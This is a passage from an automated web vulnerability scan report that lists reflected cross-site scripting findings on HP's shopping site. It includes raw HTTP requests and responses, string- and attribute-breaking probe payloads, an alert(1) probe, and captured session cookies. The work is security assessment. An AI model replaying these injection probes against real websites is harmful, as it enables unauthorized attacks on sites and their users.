Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlkjit%2BQ3Ql7NSzqs1TccwGd0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apopup%3Afree%20shipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; EMID=; s_depth=17; s_cc=true; HP_EBUS_HP_CLICKS=4x15x6213; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Aeveryday%252520computing%25253Ap7xt_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BstoConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:17 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=TyYTT6KpZwV7QBtJlQzC8zGqmWMx2TfhNgDFBZVQCyQfJd6SKdvL!-1039217636; expires=Friday, 23-Sep-2011 01:09:18 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:18 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 230077

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=36259d" a=b 8dcb49babd8&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do">
...[SNIP]...

1.25. http://www.shopping.hp.com/supplies [HHOJSID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /supplies

Issue detail

The value of the HHOJSID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1423'%3b8f5ce4cb3e7 was submitted in the HHOJSID parameter. This input was echoed as c1423';8f5ce4cb3e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supplies;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_homec1423'%3b8f5ce4cb3e7 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkiit2e2AN7NS3rulTfcQyX0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=3x3x19

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:23 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrgtuf2Q18Minis1vZcQeYnGvi&s1=xss+printer&s2=xss+printeredf6ffb93d89de9464acd56a&s3=edf6ffb9384ae95321d80a57; expires=Friday, 20-Jan-2012 00:55:23 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:23 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 201417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...
<landing||1|;;;>

var s_prop21 = 'HP ink and HP toner' + "||1|";

var s_pageName = 'hho:gs:landing:ink_toner';
var s_prop4 = 'in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_homec1423';8f5ce4cb3e7|HP ink and HP toner';
var s_channel = 'supplies';
var s_eVar23 = s_channel;
var omni_category = '';
if(omni_category != '') {
   var s_eVar22 = 'supplies:' + omni_category;
   var s_prop25 = 'supp
...[SNIP]...

1.26. http://www.shopping.hp.com/webapp/shopping/add_to_cart.do [nextPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/add_to_cart.do

Issue detail

The value of the nextPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee7f9"a%3d"b"da6a923fc98 was submitted in the nextPage parameter. This input was echoed as ee7f9"a="b"da6a923fc98 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /webapp/shopping/add_to_cart.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 298
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; HP_EBUS_HP_CLICKS=4x16x6387; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON

add_prod_id=BV704AA%2523ABA&ajaxCall=false&ADD=ADD&page=&nextPage=%2Fproduct_detail.do%3FstoreName%3Dcomputer_store%26landing%3Ddesktops%26category%3Dp7xt_series%26subcat1%3Drts%26catLevel%3D3%26mc%3D%26product_code%3DBV704AA%2523ABA%26tab%3D%26fromPage%3D%2Fshopping%2Fgeneric_subcategory.doee7f9"a%3d"b"da6a923fc98&qty=1

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:38 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224764

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
/product_detail.do?clear_recommends=1&storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.doee7f9"a="b"da6a923fc98&pageLink=true&bvLoadCart=1&omniData=" class="udrlinesmall">
...[SNIP]...

1.27. http://www.shopping.hp.com/webapp/shopping/can.do [catLevel parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/can.do

Issue detail

The value of the catLevel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c9e0"%20a%3db%2063316488f92 was submitted in the catLevel parameter. This input was echoed as 6c9e0" a=b 63316488f92 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/can.do?landing=esp&category=Notebook&catLevel=16c9e0"%20a%3db%2063316488f92&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; hpcompc_usen=cartExists=true; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11101; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aservices%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fcan.do_landing%25253Desp%252526category%25253DNotebook%252526catLevel%25253D1%252526storeName%25253Dstorefronts%252526jumpid%25253Din__1%2526oidt%253D1%2526ot%253DIMG%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:20:20 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:20:22 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 403530


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=storefronts&landing=esp&category=Notebook&subcat1=&catLevel=16c9e0" a=b 63316488f92&mc=&product_code=UL031A&tab=&fromPage=/shopping/can.do">
...[SNIP]...

1.28. http://www.shopping.hp.com/webapp/shopping/can.do [jumpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/can.do

Issue detail

The value of the jumpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0f61'%3b147eb6a0738 was submitted in the jumpid parameter. This input was echoed as d0f61';147eb6a0738 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/can.do?landing=esp&category=Notebook&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCsd0f61'%3b147eb6a0738 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; hpcompc_usen=cartExists=true; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11101; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aservices%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fcan.do_landing%25253Desp%252526category%25253DNotebook%252526catLevel%25253D1%252526storeName%25253Dstorefronts%252526jumpid%25253Din__1%2526oidt%253D1%2526ot%253DIMG%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:20:42 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:20:41 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 400395


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
null")
omni_subcat1 = "";

var s_prop21 = "|" + omni_category + "|" + omni_catLevel + "|" + omni_subcat1 ;
var s_prop4 = 'in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCsd0f61';147eb6a0738|Laptops and mini PCs';
var omni_landing = 'esp';

if(omni_landing == null || omni_landing == '' || omni_landing == 'null')
omni_landing = '';
if(omni_category == null || omn
...[SNIP]...

1.29. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [PROD_LIST parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The value of the PROD_LIST request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e7d1"%3ba4830b19c2d was submitted in the PROD_LIST parameter. This input was echoed as 6e7d1";a4830b19c2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
